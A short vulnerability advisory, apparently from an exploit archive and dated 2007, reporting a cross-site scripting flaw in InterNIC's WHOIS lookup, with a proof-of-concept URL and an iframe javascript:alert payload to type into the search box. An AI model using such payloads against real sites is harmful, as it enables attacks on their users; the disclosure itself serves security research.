Home / os / win10

internic-xss.txt

Posted on 31 July 2007

# Title		: InterNIC WHOIS lookup XSS exploit

# Description	: InterNIC has a WHOIS lookup function wich suffers from an XSS vulnerability

# Author	: Tosser

# Contact	: ht7015@gmail.com

# Proof		:

http://reports.internic.net/cgi/whois?whois_nic=%3Ciframe%20src=%22javascript:alert('XSS')%22%3E&type=domain

or go to http://www.internic.net/, then choose Whois from the menu, and type

<iframe src="javascript:alert('XSS')">

in the inputbox and click Submit.

 

TOP